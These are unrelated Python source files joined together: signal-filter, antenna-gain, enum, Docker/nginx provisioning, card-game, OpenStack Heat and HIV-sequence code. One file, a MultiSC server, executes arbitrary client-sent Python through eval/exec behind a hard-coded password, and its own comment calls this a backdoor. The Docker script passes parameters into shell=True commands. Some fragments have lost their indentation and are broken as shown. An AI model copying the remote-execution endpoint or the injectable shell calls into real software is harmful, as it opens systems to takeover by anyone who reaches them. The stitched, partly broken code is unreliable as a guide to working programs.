y = numpy.concatenate( ( y[ len( y ) // 2 : ], y[ : len( y ) // 2 ] ) )
if ( length > 2 ) :
y[ 0 ] = y[ 1 ] * 2.0 - y[ 2 ]
return y, f
def filter( self, x : Union[ List, numpy.ndarray ] ) -> numpy.ndarray :
""" Filters an incident signal and produces a reference signal.
Arguments :
x : Union[ List, numpy.ndarray ] - incident signal.
Returns :
y : numpy.ndarray - reference signal.
"""
if ( ( not numpy.isscalar( x ) ) and ( not isinstance( x, numpy.ndarray ) ) ) :
x = numpy.array( list( x ) )
if ( not len( x ) ) :
raise ValueError( f'X = {x}' )
y = numpy.zeros( len( x ), type( self.b[ 0 ] ) )
for ii in range( 0, len( x ) ) :
self.s[ 0 ] = x[ ii ]
y[ ii ] = self.b.dot( self.s )
if ( len( self.s ) > 1 ) :
self.s[ 1 : ] = self.s[ : -1 ]
return y
def reset( self, x : Union[ complex, float ] ) -> None :
""" Modifies a state to minimize edge effects by assuming persistent
operation at a specified incident signal condition.
Arguments :
x : Union[ complex, float ] - incident signal.
"""
if ( not numpy.isscalar( x ) ) :
raise ValueError( f'X = {x}' )
self.s.fill( x )
def response( self, length = 8192, count = 1 ) -> Tuple[ numpy.ndarray, numpy.ndarray ] :
    """ Estimates frequency response and produces a reference signal.
        Arguments :
        length : int - number of frequency bins ( must be positive ).
        count : int - cascade count ; the response is raised to this power.
        Returns :
        y : numpy.ndarray - complex frequency response.
        f : numpy.ndarray - frequency axis relative to Nyquist in [ -1.0, 1.0 ).
    """
    if ( length <= 0 ) :
        raise ValueError( f'Length = {length}' )
    if ( count <= 0 ) :
        raise ValueError( f'Count = {count}' )
    # FIR response : the denominator [ 1.0, 0.0 ] is equivalent to unity.
    y, f = scipy.signal.freqz( self.b, [ 1.0, 0.0 ], length, True )[ 1 ], numpy.linspace( -1.0, 1.0 - 2.0 / length, length )
    # Rotate halves to a [ -Nyquist, +Nyquist ) axis ; cascading count
    # identical stages multiplies responses, i.e. exponentiation here.
    y = numpy.concatenate( ( y[ len( y ) // 2 : ], y[ : len( y ) // 2 ] ) ) ** count
    return y, f
def roots( self, count = 1 ) -> Tuple[ numpy.ndarray, numpy.ndarray ] :
    """ Estimates roots of a frequency response in poles and zeros.
        An FIR response has every pole at the origin ; the zeros are the
        roots of the coefficient polynomial, replicated count times and
        ordered by ascending magnitude.
        Arguments :
        count : int - cascade count.
        Returns :
        p : numpy.ndarray - poles ( all zero ).
        z : numpy.ndarray - zeros, sorted by magnitude.
    """
    zeros = numpy.tile( numpy.roots( self.b ), count )
    order = numpy.argsort( abs( zeros ) )
    poles = numpy.zeros( count * ( len( self.b ) - 1 ) )
    return poles, zeros[ order ]
|
'''
Antenna array gain
===========================
'''
import time
import numpy as np
import pyant

# 22 x 22 uniform grid of antenna positions spanning [-50, 50] m in x and y;
# the z coordinate is left at 0 (planar array).
xv, yv = np.meshgrid(np.linspace(-50,50, num=22), np.linspace(-50,50, num=22))
antennas = np.zeros((22**2, 3))
antennas[:,0] = xv.flatten()
antennas[:,1] = yv.flatten()

# Zenith-pointing array model at 46.5 MHz.
ant = pyant.Array(
    azimuth=0,
    elevation=90.0,
    frequency=46.5e6,
    antennas=antennas,
)

## Uncomment these to try the speed up for more complex gain calculations
# start_time = time.time()
# pyant.plotting.gain_heatmap(ant, resolution=100, min_elevation=80.0, vectorized=False)
# print(f'"gain_heatmap" ({100**2}) loop performance: {time.time() - start_time:.1e} seconds')
# start_time = time.time()
# pyant.plotting.gain_heatmap(ant, resolution=100, min_elevation=80.0, vectorized=True)
# print(f'"gain_heatmap" ({100**2}) vectorized performance: {time.time() - start_time:.1e} seconds')

# Render a 100x100 gain heatmap above 80 degrees elevation and show it.
pyant.plotting.gain_heatmap(ant, resolution=100, min_elevation=80.0)
pyant.plotting.show()
|
"""
App Messages Enum Module for Flambda APP
Version: 1.0.0
"""
from enum import IntEnum
class MessagesEnum(IntEnum):
    """Application result/error codes with an i18n label and message template.

    Each member carries three pieces of data: a numeric code (also the enum
    value), an i18n label key, and a human-readable message that may contain
    %-style placeholders.
    """

    def __new__(cls, value, label, message=''):
        # Build the int-based member, then attach the extra metadata.
        obj = int.__new__(cls, value)
        obj._value_ = value
        obj.code = value
        obj.label = label
        obj.message = message
        return obj

    # Common messages 1-10
    OK = 1, 'common.success', 'Success'
    NOK = 2, 'common.error.nok', '%s'
    REQUEST_ERROR = 3, 'common.error.request_error', '%s'
    UNSUPPORTED_MEDIA_TYPE_ERROR = 4, 'common.error.unsupported_media_type_error', \
        'Unsupported media type: %s, supported types are (%s)'
    METHOD_NOT_IMPLEMENTED_ERROR = 5, 'common.error.method_not_implemented_error', 'Method not implemented yet'
    UNKNOWN_ERROR = 6, 'common.error.unknown_error', 'Unknown error'
    INTERNAL_SERVER_ERROR = 7, 'common.error.internal_server_error', 'Internal Server Error'

    # Request errors 11 - 30
    LIST_ERROR = 11, 'common.error.list_error', 'Unable to return the list data, please review your request'
    FILTERS_ERROR = 12, 'common.error.filters_error', 'Filters must be informed'
    PARAM_REQUIRED_ERROR = 13, 'common.error.param_required_error', 'Parameter %s is required'
    FIND_ERROR = 14, 'common.error.find_error', 'Unable to find the record'
    INVALID_FILTER_ERROR = 15, 'common.error.invalid_filter_error', 'Invalid filter in request'
    # NOTE(review): this label repeats INVALID_FILTER_ERROR's key; confirm
    # whether 'common.error.invalid_field_filter_error' was intended.
    INVALID_FIELD_FILTER_ERROR = 16, 'common.error.invalid_filter_error', \
        'Invalid filter value (%s) for filter (%s). Expected (%s)'
    CREATE_ERROR = 17, 'common.error.create_error', 'Unable to create the record'
    UPDATE_ERROR = 18, 'common.error.update_error', 'Unable to update the record'
    # Bug fix: DELETE_ERROR and SOFT_DELETE_ERROR previously reused value 18.
    # Duplicate Enum values become aliases of the first member, so both
    # resolved to UPDATE_ERROR and lost their own label/message. Unique
    # codes restore them as distinct members.
    DELETE_ERROR = 19, 'common.error.delete_error', 'Unable to delete the record'
    SOFT_DELETE_ERROR = 20, 'common.error.soft_delete_error', 'Unable to disable the record'

    # validation 31 - 50
    VALIDATION_ERROR = 31, 'common.error.validation_error', 'Validation error, please review your params: value (%s) for param (%s)'
    INVALID_ISO_DATE_ERROR = 32, 'common.error.invalid_iso_date', 'Invalid iso date value (%s) for param (%s)'

    # Database errors 51 - 100
    QUERY_ERROR = 51, 'common.error.query_error', 'Unable to execute the query'
    INVALID_ENTITY_ID = 52, 'common.error.invalid_entity_id', 'Unable to find the entity'
    ENTITY_DELETION_SUCCESS = 53, 'common.entity_deletion_success', 'Entity deleted with success'

    # Events 101 - 200
    EVENT_NOT_REGISTERED_ERROR = 101, 'common.error.event_not_registered_error', 'Event not registered'
    EVENT_REGISTERED_WITH_SUCCESS = 102, 'common.event_registered_with_success', 'Event registered with success'
    EVENT_NOT_SENT_ERROR = 103, 'common.error.event_not_sent_error', 'Event not sent'
    EVENT_ALREADY_REGISTERED_ERROR = 104, 'common.error.event_already_registered_error', 'Event already registered'
    EVENT_TYPE_UNKNOWN_ERROR = 105, 'common.error.event_type_unknown_error', 'Event type unknown: (%s)'

    # Others 201 - 300
    MAPPING_ERROR = 201, 'common.error.mapping_error', 'Unable to mapping the data'
    UNMAPPING_ERROR = 202, 'common.error.unmapping_error', 'Unable to unmapping the data'
|
import frappe
def get_context(context):
    """Populate the web page context with a fixed test value."""
    # Equivalent to ``context.test = "Hello"``; frappe's context object
    # exposes keys as attributes.
    setattr(context, "test", "Hello")
|
from __future__ import print_function
import pandas
import matplotlib; matplotlib.use('Agg')
import sys, os, copy, math, numpy as np, matplotlib.pyplot as plt
from tabulate import tabulate
from munkres import Munkres
from collections import defaultdict
try:
from ordereddict import OrderedDict # can be installed using pip
except:
from collections import OrderedDict # only included from python 2.7 on
import mailpy
from box_util import boxoverlap, box3doverlap
from evaluate_kitti3dmot_model import *
def run(*argv):
    """Evaluate a 3D/2D multi-object-tracking result and append its metrics
    to a pandas DataFrame.

    Parameters:
        argv[0]: result_sha - unique key of the submitted results; its
                 underscore-separated fields encode the tracked object
                 class and detection type.
        argv[1]: dir - results directory to evaluate.
        argv[2]: '2D' or '3D' - which IoU criterion to use.
        argv[3]: df - pandas DataFrame into which one metrics row is added.
        argv[4]: name of the evaluated model; must match the folder where
                 the results are stored (append '*' when tracked objects
                 are not in separate subfolders).
        argv[5:]: optional subfolder/sequence selector; only the last
                  argument is forwarded to evaluate().

    Returns:
        (MOTA, MOTP, df) for the evaluated model.
    """
    num_sample_pts = 41.0
    # check for correct number of arguments. if user_sha and email are not supplied,
    # no notification email is sent (this option is used for auto-updates)
    if len(argv)<5:
        print("Usage: python eval_kitti3dmot.py result_sha ?D(e.g. 2D or 3D)")
        sys.exit(1);
    # get unique sha key of submitted results
    result_sha = argv[0]
    obj_tracked = result_sha.split("_")[0]
    dir = argv[1]
    dt_typ= result_sha.split("_")[3]
    df = argv[3]
    mail = mailpy.Mail("")
    D = argv[2]
    # Select the IoU criterion used by the evaluator.
    if argv[2] == '2D':
        eval_3diou, eval_2diou = False, True # eval 2d
    elif argv[2] == '3D':
        eval_3diou, eval_2diou = True, False # eval 3d
    else:
        print("Usage: python eval_kitti3dmot.py result_sha ?D(e.g. 2D or 3D)")
        sys.exit(1);
    # evaluate results
    other_name = argv[4]
    # NOTE(review): `mail` is constructed twice, and `num_sample_pts`,
    # `obj_tracked`, `dt_typ` and `D` are unused here - presumably
    # leftovers from the upstream KITTI evaluation script.
    mail = mailpy.Mail("")
    print("Evaluating "+dir +" :")
    if len(argv) >5:
        last_arg = argv[-1]
    else:
        last_arg =None
    success, other_model, om_avgs = evaluate(result_sha, dir, other_name, mail,eval_3diou,eval_2diou, last_arg)
    # Assemble one row of CLEAR-MOT tracking metrics plus derived stats.
    new_row = [dir,other_model.sMOTA, other_model.MOTA, other_model.MOTP, other_model.MT, other_model.ML, other_model.id_switches, other_model.fragments, \
               other_model.F1, other_model.precision, other_model.recall, other_model.FAR, other_model.tp, other_model.fp, other_model.fn,\
               om_avgs[0], om_avgs[1], om_avgs[2]]
    df.loc[len(df.index)] = new_row
    return other_model.MOTA, other_model.MOTP, df


if __name__ == "__main__":
    # NOTE(review): called with no arguments this always prints usage and
    # exits; real invocations pass argv from a driver script.
    run()
|
#!/usr/bin/python3
# Credit https://github.com/oskarhane/dockerpress Written by Oskar Hane <oh@oskarhane.com>
# Credit http://geraldkaszuba.com/quickly-ssh-into-a-docker-container/
import subprocess
import sys
import re
import shutil
import json
from optparse import OptionParser
def create_nginx_config(container_id):
    """Create and validate an nginx vhost config for a running container.

    Looks up the container's domain (the last column of ``docker ps``
    output) and the host port mapped to container port 80, then writes and
    tests the nginx site file.

    Returns True on success, or an error-description string on failure.
    """
    command = ["docker ps | grep " + container_id[:6]]
    p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
    output, err = p.communicate()
    d_str = output.decode("utf-8")
    p.stdout.close()
    # Raw string: the pattern contains regex escapes (\s, \S). The final
    # whitespace-separated token of the `docker ps` line is the container
    # name, used as the site's domain.
    domain = re.findall(r'\s([\S]+)\s*$', d_str)
    port = get_docker_port(container_id[:6], 80)
    if not port:
        return 'Port 80 not open'
    print('{0} {1} {2}'.format(container_id[:6], domain[0], port))
    conf_test = write_and_test_nginx_config(container_id[:6], domain[0], port)
    if not conf_test:
        return 'Error in Nginx config. Check file.'
    return True
# Expected success output from `nginx configtest`: "Testing nginx configuration: nginx."
def write_and_test_nginx_config(container_id, url, port):
    """Write the nginx site file for *url* and validate the configuration.

    When `nginx configtest` reports a failure, the broken file is moved
    from sites-enabled to sites-available so nginx can still reload.

    Returns True when the config test passes, False otherwise.
    """
    conf_dir = '/etc/nginx/sites-enabled/'
    fail_dir = '/etc/nginx/sites-available/'
    conf_str = get_nginx_conf(container_id, url, port)
    # Context manager guarantees the handle is closed even on write errors
    # (the original relied on explicit close with no error handling).
    with open(conf_dir + url, 'w+') as f:
        f.write(conf_str)
    test_command = ["/etc/init.d/nginx configtest"]
    p_ok = subprocess.Popen(test_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    ok_output, err = p_ok.communicate()
    err_response = err.decode("utf-8")
    p_ok.stdout.close()
    p_ok.stderr.close()
    if not re.search('(failed)', err_response):
        return True
    # Quarantine the invalid config so it is not loaded on reload.
    shutil.move(conf_dir + url, fail_dir + url)
    return False
def get_port_from_address(address):
    """Extract the port from a "host:port" address string.

    Raises AttributeError when the address has no trailing port.
    """
    # Raw string: the pattern contains the regex escape \s.
    return re.search(r':([0-9]+)\s*$', address).group(1)
def get_nginx_conf(container_id, url, http_port):
    """Render the nginx upstream/server configuration for one container."""
    config_lines = [
        'upstream ' + container_id + ' {',
        '\tserver 127.0.0.1:' + http_port + ';',
        '}',
        'server {',
        '\tlisten 80;',
        '\tserver_name ' + url + ';',
        '\tlocation / {',
        '\t\tproxy_pass http://' + container_id + ';',
        '\t\tproxy_set_header X-Real-IP $remote_addr;',
        '\t\tproxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;',
        '\t\tproxy_set_header X-NginX-Proxy true;',
        '\t\tproxy_set_header Host $host;',
        '\t\tproxy_redirect off;',
        '\t}',
        '}',
    ]
    return '\n'.join(config_lines)
def create_docker_action(options):
    """Create a container for options.url and wire up its nginx vhost.

    Exits via the module-level parser.error() when the URL is missing or
    is not a valid lowercase domain name.
    """
    if not options.url:
        parser.error("You must provide a URL to create a site for")
    # Raw string: the pattern contains the regex escape \. (literal dot).
    if not re.search(r'^([a-z0-9\.-]+\.[a-z]{2,4})$', options.url):
        parser.error('The given url is not a valid domain')
    create_project_specifc_dockerfile(options.project_code, options.maintainer)
    image_tag = create_docker_project_image(options.project_code)
    container_id = create_docker_container(options.url, image_tag)
    print("Container created: {0}".format(container_id))
    nginx_conf = create_nginx_config(container_id)
    if nginx_conf == True:
        print('All ok, you can safetly reload nginx now. service nginx reload')
    else:
        print('Nginx config failed. Please check file /etc/nginx/sites-available/' + options.url)
        print(nginx_conf)
def get_docker_port(container_id, container_port):
    """Return the host port string mapped to *container_port* of the container."""
    command = ['docker port %s %s' % (container_id, container_port)]
    output = subprocess.check_output(command, shell=True).decode('utf-8')
    return get_port_from_address(output)
def create_project_specifc_dockerfile(project_code, maintainer):
    """Write a project-specific Dockerfile to the current directory.

    The generated image extends the bootstrap image, installs the
    project's public SSH key and runs supervisord as the entry point.
    """
    dockerfile_content = """
FROM {image}
MAINTAINER {maintainer}
ENV PROJECT_CODE {project_code}
ADD ./id_rsa_$PROJECT_CODE.pub /root/.ssh/
ADD ./supervisord.conf /etc/supervisor/conf.d/supervisord.conf
RUN cat /root/.ssh/id_rsa_$PROJECT_CODE.pub >> /root/.ssh/authorized_keys
RUN chmod 600 /root/.ssh/authorized_keys
RUN echo "$PROJECT_CODE" >>/home/index.html
CMD ["/usr/bin/supervisord"]
""".format(project_code=project_code, image="open-platform-hk/bootstrap:0.1", maintainer=maintainer)
    print("result dockerfile:")
    print(dockerfile_content)
    ##Docker don't support other file name while with context
    # Bug fix: the original ended with `target.close` (attribute access,
    # not a call), so the file was only closed by interpreter shutdown.
    # `with` closes it deterministically.
    with open("Dockerfile", 'w') as target:
        target.write(dockerfile_content)
def create_docker_project_image(project_code):
    """Build the project's docker image and return its tag ("<code>:0.1")."""
    tag = '%s:0.1' % project_code
    builder = subprocess.Popen(['docker build -t {tag} .'.format(tag=tag)],
                               stdout=subprocess.PIPE, shell=True)
    # Wait for the build to finish; build output itself is not inspected.
    builder.communicate()
    builder.stdout.close()
    return tag
def create_docker_container(url, image_tag):
    """Start a detached container named after *url*, exposing ports 80 and 22.

    Returns docker's stdout (the new container id, with trailing newline).
    """
    image = image_tag
    command = ["docker run -d -t -i -p 80 -p 22 --name '{url}' {image}".format( url=url,image=image)]
    p = subprocess.Popen(command, stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=True)
    output, err = p.communicate()
    container_id = output.decode("utf-8")
    ##TODO err handling
    p.stderr.close()
    p.stdout.close()
    return container_id
if __name__ == "__main__":
    # CLI entry point: either SSH-port lookup (--action ssh) or full
    # container + nginx site creation for the given project code.
    usage = "usage: %prog [options]"
    parser = OptionParser(usage=usage)
    parser.add_option("--code", dest="project_code", help="Project Code to create a site for.")
    parser.add_option("--id", dest="container_id", help="Container id to ssh.")
    parser.add_option("--action", dest="action", help="Action")
    parser.add_option("--maintainer", dest="maintainer", help="Maintainer")
    options, args = parser.parse_args()
    # The site URL is derived from the project code, not user-supplied.
    options.url = '{project_code}.dev.code4.hk'.format(project_code=options.project_code)
    if not (options.maintainer):
        options.maintainer='code4hk@gmail.com'
    if (options.action == 'ssh'):
        # Print the host port mapped to the container's SSH port (22).
        print (get_docker_port(options.container_id,22))
    else:
        create_docker_action(options)
|
from cardboard import types
from cardboard.ability import (
AbilityNotImplemented, spell, activated, triggered, static
)
from cardboard.cards import card, common, keywords, match
@card("Beast Hunt")
def beast_hunt(card, abilities):
    """Auto-generated ability stubs for the card "Beast Hunt"."""

    def beast_hunt():
        return AbilityNotImplemented

    return beast_hunt,


@card("Kor Sanctifiers")
def kor_sanctifiers(card, abilities):
    """Auto-generated ability stubs for the card "Kor Sanctifiers".

    NOTE(review): both inner stubs share one name, so the returned tuple
    holds two references to the *second* definition - harmless while both
    are unimplemented placeholders, but rename them when implementing.
    """

    def kor_sanctifiers():
        return AbilityNotImplemented

    def kor_sanctifiers():
        return AbilityNotImplemented

    return kor_sanctifiers, kor_sanctifiers,


@card("Whiplash Trap")
def whiplash_trap(card, abilities):
    """Auto-generated ability stubs for the card "Whiplash Trap".

    NOTE(review): same duplicate-inner-name pattern as Kor Sanctifiers.
    """

    def whiplash_trap():
        return AbilityNotImplemented

    def whiplash_trap():
        return AbilityNotImplemented

    return whiplash_trap, whiplash_trap,


@card("Hideous End")
def hideous_end(card, abilities):
    """Auto-generated ability stub for the card "Hideous End"."""

    def hideous_end():
        return AbilityNotImplemented

    return hideous_end,
|
from MultiSC.MultiServer.quick_setup.manager import (
ProtocolsManager,
MonitorManager,
Runner,
)
# Simple protocol that runs a Python command sent by the client.
@ProtocolsManager.add("run_command", "command")
def func(query):
    """Execute an arbitrary Python snippet supplied by the client.

    SECURITY WARNING: this evaluates/executes remote input guarded only by
    a hard-coded plaintext password - effectively a remote-code-execution
    backdoor. Do not expose it outside a trusted test network; prefer a
    whitelist of commands and a secret loaded from configuration.
    """
    if query["password"] != "runpass12345665":
        return "password wrong!"
    # First try as an expression so the result can be returned...
    try:
        return eval(query["command"])
    except BaseException:  # deliberate best-effort: fall through to exec
        pass
    # ...then as a statement executed for its side effects only.
    try:
        exec(query["command"])
        return "command success"
    except BaseException:  # deliberate best-effort: report generic failure
        pass
    # Bug fix: response string previously read "command faild".
    return "command failed"
# Instantiate and start the server loop (blocks until shutdown).
Server = Runner()
Server.run()
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.octavia import octavia_base
from heat.engine import support
from heat.engine import translation
class Pool(octavia_base.OctaviaBase):
    """A resource for managing Octavia Pools.

    This resources manages octavia LBaaS Pools, which represent a group
    of nodes. Pools define the subnet where nodes reside, balancing algorithm,
    and the nodes themselves.
    """

    # Heat property keys (left) paired with their Octavia API field names
    # (right); note LISTENER/LOADBALANCER are later translated to *_id.
    PROPERTIES = (
        ADMIN_STATE_UP, DESCRIPTION, SESSION_PERSISTENCE, NAME,
        LB_ALGORITHM, LISTENER, LOADBALANCER, PROTOCOL,
        SESSION_PERSISTENCE_TYPE, SESSION_PERSISTENCE_COOKIE_NAME,
        TLS_ENABLED,
    ) = (
        'admin_state_up', 'description', 'session_persistence', 'name',
        'lb_algorithm', 'listener', 'loadbalancer', 'protocol',
        'type', 'cookie_name', 'tls_enabled',
    )

    # Allowed values of the session persistence 'type' sub-property.
    SESSION_PERSISTENCE_TYPES = (
        SOURCE_IP, HTTP_COOKIE, APP_COOKIE
    ) = (
        'SOURCE_IP', 'HTTP_COOKIE', 'APP_COOKIE'
    )

    SUPPORTED_PROTOCOLS = (TCP, HTTP, HTTPS, TERMINATED_HTTPS, PROXY, UDP) = (
        'TCP', 'HTTP', 'HTTPS', 'TERMINATED_HTTPS', 'PROXY', 'UDP')

    # Read-only attributes exposed to template authors via get_attr.
    ATTRIBUTES = (
        HEALTHMONITOR_ID_ATTR, LISTENERS_ATTR, MEMBERS_ATTR
    ) = (
        'healthmonitor_id', 'listeners', 'members'
    )

    properties_schema = {
        ADMIN_STATE_UP: properties.Schema(
            properties.Schema.BOOLEAN,
            _('The administrative state of this pool.'),
            default=True,
            update_allowed=True
        ),
        DESCRIPTION: properties.Schema(
            properties.Schema.STRING,
            _('Description of this pool.'),
            update_allowed=True,
            default=''
        ),
        SESSION_PERSISTENCE: properties.Schema(
            properties.Schema.MAP,
            _('Configuration of session persistence.'),
            schema={
                SESSION_PERSISTENCE_TYPE: properties.Schema(
                    properties.Schema.STRING,
                    _('Method of implementation of session '
                      'persistence feature.'),
                    required=True,
                    constraints=[constraints.AllowedValues(
                        SESSION_PERSISTENCE_TYPES
                    )]
                ),
                SESSION_PERSISTENCE_COOKIE_NAME: properties.Schema(
                    properties.Schema.STRING,
                    _('Name of the cookie, '
                      'required if type is APP_COOKIE.')
                )
            },
            update_allowed=True,
        ),
        NAME: properties.Schema(
            properties.Schema.STRING,
            _('Name of this pool.'),
            update_allowed=True
        ),
        LB_ALGORITHM: properties.Schema(
            properties.Schema.STRING,
            _('The algorithm used to distribute load between the members of '
              'the pool.'),
            required=True,
            constraints=[
                constraints.AllowedValues(['ROUND_ROBIN', 'LEAST_CONNECTIONS',
                                           'SOURCE_IP', 'SOURCE_IP_PORT']),
            ],
            update_allowed=True,
        ),
        LISTENER: properties.Schema(
            properties.Schema.STRING,
            _('Listener name or ID to be associated with this pool.'),
            constraints=[
                constraints.CustomConstraint('octavia.listener')
            ]
        ),
        LOADBALANCER: properties.Schema(
            properties.Schema.STRING,
            _('Loadbalancer name or ID to be associated with this pool.'),
            constraints=[
                constraints.CustomConstraint('octavia.loadbalancer')
            ],
        ),
        PROTOCOL: properties.Schema(
            properties.Schema.STRING,
            _('Protocol of the pool.'),
            required=True,
            constraints=[
                constraints.AllowedValues(SUPPORTED_PROTOCOLS),
            ]
        ),
        TLS_ENABLED: properties.Schema(
            properties.Schema.BOOLEAN,
            _('Enable backend member re-encryption.'),
            default=False,
            update_allowed=True,
            support_status=support.SupportStatus(version='14.0.0'),
        ),
    }

    attributes_schema = {
        HEALTHMONITOR_ID_ATTR: attributes.Schema(
            _('ID of the health monitor associated with this pool.'),
            type=attributes.Schema.STRING
        ),
        LISTENERS_ATTR: attributes.Schema(
            _('Listener associated with this pool.'),
            type=attributes.Schema.STRING
        ),
        MEMBERS_ATTR: attributes.Schema(
            _('Members associated with this pool.'),
            cache_mode=attributes.Schema.CACHE_NONE,
            type=attributes.Schema.LIST
        ),
    }

    def translation_rules(self, props):
        """Resolve listener/loadbalancer names to IDs via the Octavia client."""
        return [
            translation.TranslationRule(
                props,
                translation.TranslationRule.RESOLVE,
                [self.LISTENER],
                client_plugin=self.client_plugin(),
                finder='get_listener',
            ),
            translation.TranslationRule(
                props,
                translation.TranslationRule.RESOLVE,
                [self.LOADBALANCER],
                client_plugin=self.client_plugin(),
                finder='get_loadbalancer',
            ),
        ]

    def _prepare_args(self, properties):
        """Convert Heat properties into Octavia pool-create arguments."""
        # Drop unset properties; Octavia rejects explicit nulls.
        props = dict((k, v) for k, v in properties.items() if v is not None)
        if self.NAME not in props:
            props[self.NAME] = self.physical_resource_name()
        # Heat exposes names; the Octavia API expects *_id fields.
        if self.LISTENER in props:
            props['listener_id'] = props.pop(self.LISTENER)
        if self.LOADBALANCER in props:
            props['loadbalancer_id'] = props.pop(self.LOADBALANCER)
        self._prepare_session_persistence(props)
        return props

    def _prepare_session_persistence(self, props):
        """Strip unset sub-keys from the session_persistence map, if present."""
        session_p = props.get(self.SESSION_PERSISTENCE)
        if session_p is not None:
            session_props = dict(
                (k, v) for k, v in session_p.items() if v is not None)
            props[self.SESSION_PERSISTENCE] = session_props

    def validate(self):
        """Check cross-property constraints beyond the per-property schema."""
        super(Pool, self).validate()
        # The pool must attach to either a listener or a loadbalancer.
        if (self.properties[self.LISTENER] is None and
                self.properties[self.LOADBALANCER] is None):
            raise exception.PropertyUnspecifiedError(self.LISTENER,
                                                     self.LOADBALANCER)
        if self.properties[self.SESSION_PERSISTENCE] is not None:
            session_p = self.properties[self.SESSION_PERSISTENCE]
            persistence_type = session_p[self.SESSION_PERSISTENCE_TYPE]
            # APP_COOKIE requires a cookie name; SOURCE_IP forbids one.
            if persistence_type == self.APP_COOKIE:
                if not session_p.get(self.SESSION_PERSISTENCE_COOKIE_NAME):
                    msg = (_('Property %(cookie)s is required when %(sp)s '
                             'type is set to %(app)s.') %
                           {'cookie': self.SESSION_PERSISTENCE_COOKIE_NAME,
                            'sp': self.SESSION_PERSISTENCE,
                            'app': self.APP_COOKIE})
                    raise exception.StackValidationFailed(message=msg)
            elif persistence_type == self.SOURCE_IP:
                if session_p.get(self.SESSION_PERSISTENCE_COOKIE_NAME):
                    msg = (_('Property %(cookie)s must NOT be specified when '
                             '%(sp)s type is set to %(ip)s.') %
                           {'cookie': self.SESSION_PERSISTENCE_COOKIE_NAME,
                            'sp': self.SESSION_PERSISTENCE,
                            'ip': self.SOURCE_IP})
                    raise exception.StackValidationFailed(message=msg)

    def _resource_create(self, properties):
        """Create the pool via the Octavia API and return its description."""
        return self.client().pool_create(json={'pool': properties})['pool']

    def _resource_update(self, prop_diff):
        """Push changed (non-null) properties to the existing pool."""
        props = dict((k, v) for k, v in prop_diff.items() if v is not None)
        self._prepare_session_persistence(props)
        self.client().pool_set(self.resource_id, json={'pool': props})

    def _resource_delete(self):
        """Delete the pool in Octavia."""
        self.client().pool_delete(self.resource_id)

    def _show_resource(self):
        """Fetch the pool's current state from Octavia."""
        return self.client().pool_show(self.resource_id)
def resource_mapping():
    """Map Heat resource type names to their implementing classes."""
    mapping = {'OS::Octavia::Pool': Pool}
    return mapping
|
import os
import csv
from datetime import datetime
from collections import namedtuple
from codonutils import translate_codon
# Repository root: two directory levels above this file.
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Consensus rows keyed by gene name (each row is a csv.DictReader dict).
with open(os.path.join(ROOT, 'internalFiles', 'consensus.csv')) as fp:
    CONSENSUS = {c['Gene']: c for c in csv.DictReader(fp)}
class MutPrevalence:
    """Typed read-only view over one row of an amino-acid prevalence CSV."""

    def __init__(self, data):
        # data: csv.DictReader row with Gene/Pos/aa/Pcnt/Count/PosTotal keys.
        self._data = data

    @property
    def gene(self):
        """Gene name this prevalence entry belongs to."""
        return self._data['Gene']

    @property
    def position(self):
        """Amino-acid position (int)."""
        return int(self._data['Pos'])

    @property
    def aa(self):
        """Amino acid code ('i'/'d' encode insertion/deletion upstream)."""
        return self._data['aa']

    @property
    def percent(self):
        """Prevalence as a percentage of the position total."""
        return float(self._data['Pcnt'])

    @property
    def count(self):
        """Number of sequences carrying this amino acid."""
        return int(self._data['Count'])

    @property
    def total(self):
        """Total number of sequences covering this position."""
        return int(self._data['PosTotal'])
# Lazily-built {(gene, position, aa): MutPrevalence} lookup table.
PREVALENCE = None


def refresh_prevalence():
    """(Re)load the naive-study amino-acid prevalence tables into PREVALENCE."""
    global PREVALENCE
    PREVALENCE = {}
    for _gene in ('gag', 'gp41'):
        with open(os.path.join(
                ROOT, 'data', 'naiveStudies',
                '{}AAPrevalence.csv'.format(_gene))) as fp:
            for p in csv.DictReader(fp):
                # Index only overall rows; subtype-specific rows are skipped.
                if p['Subtype']:
                    continue
                # Normalize long-form insertion/deletion codes to one letter.
                _aa = (p['AA']
                       .replace('ins', 'i')
                       .replace('del', 'd'))
                PREVALENCE[
                    (p['Gene'], int(p['Pos']), _aa)] = MutPrevalence(p)
def get_prevalence(gene, pos, aa):
    """Return the naive-population prevalence (%) of *aa* at *pos* in *gene*,
    or 0.0 when the mutation was never observed."""
    # Lazily populate the module-level table on first use.
    if not PREVALENCE:
        refresh_prevalence()
    entry = PREVALENCE.get((gene, pos, aa))
    return 0.0 if entry is None else entry.percent
class Codon(namedtuple('Codon', ['position', 'gene',
                                 'triplet', 'cons_aa'])):
    """A single codon aligned against the gene consensus.

    Fields:
        position: amino-acid position in the gene.
        gene: gene name (e.g. 'gag').
        triplet: three-letter nucleotide codon; '---' denotes a deletion.
        cons_aa: consensus amino acid at this position.
    """

    @property
    def aa(self):
        """Translated amino acid; '-' for a deletion."""
        if self.triplet == '---':
            return '-'
        return translate_codon(self.triplet)

    @property
    def is_mutation(self):
        """True when the amino acid differs from the consensus."""
        return self.aa != self.cons_aa

    @property
    def is_deletion(self):
        # Bug fix: the original returned `self.aa != '-'`, i.e. True for
        # every codon EXCEPT deletions; a deletion is exactly aa == '-'.
        return self.aa == '-'

    @property
    def prevalence(self):
        """Naive-population prevalence (%) of this amino acid."""
        return get_prevalence(self.gene, self.position, self.aa)
class Sequence:
    """One sequenced gene fragment of a patient sample."""

    def __init__(self, seqdata):
        # seqdata: csv.DictReader row from internalFiles/sequences.csv.
        self._data = seqdata

    @property
    def pid(self):
        """Patient identifier."""
        return self._data['PID']

    @property
    def time_point(self):
        """Sampling time point label."""
        return self._data['TimePoint']

    @property
    def date(self):
